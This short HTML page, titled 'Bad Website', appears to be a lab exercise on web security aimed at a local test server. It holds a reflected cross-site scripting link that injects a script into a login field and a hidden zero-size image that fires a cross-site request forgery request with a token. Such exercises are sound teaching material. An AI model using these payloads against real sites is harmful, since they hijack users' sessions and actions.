<!DOCTYPE html>
<html>
<head>
	<title>Bad Website</title>
</head>
<body>
	<img src="icon.png" width="256" />
	<br />

	<!-- replace the href string below with your cross site script attack link -->
	<!--<a href="#">cross site script</a>-->
	<a href="http://localhost:8080/login?username=<script>window.alert('Ow mow brown cow');</script>">xss</a>

	<br />

	<!-- put an html element below to execute a cross site request forgery attack -->
	<img src="http://localhost:8080/action?token=W1Vern5T-lc-VaL9SS7EzUvgVHXD6sZVEDNPdHmAcWE" height="0" width="0" />

</body>
</html>
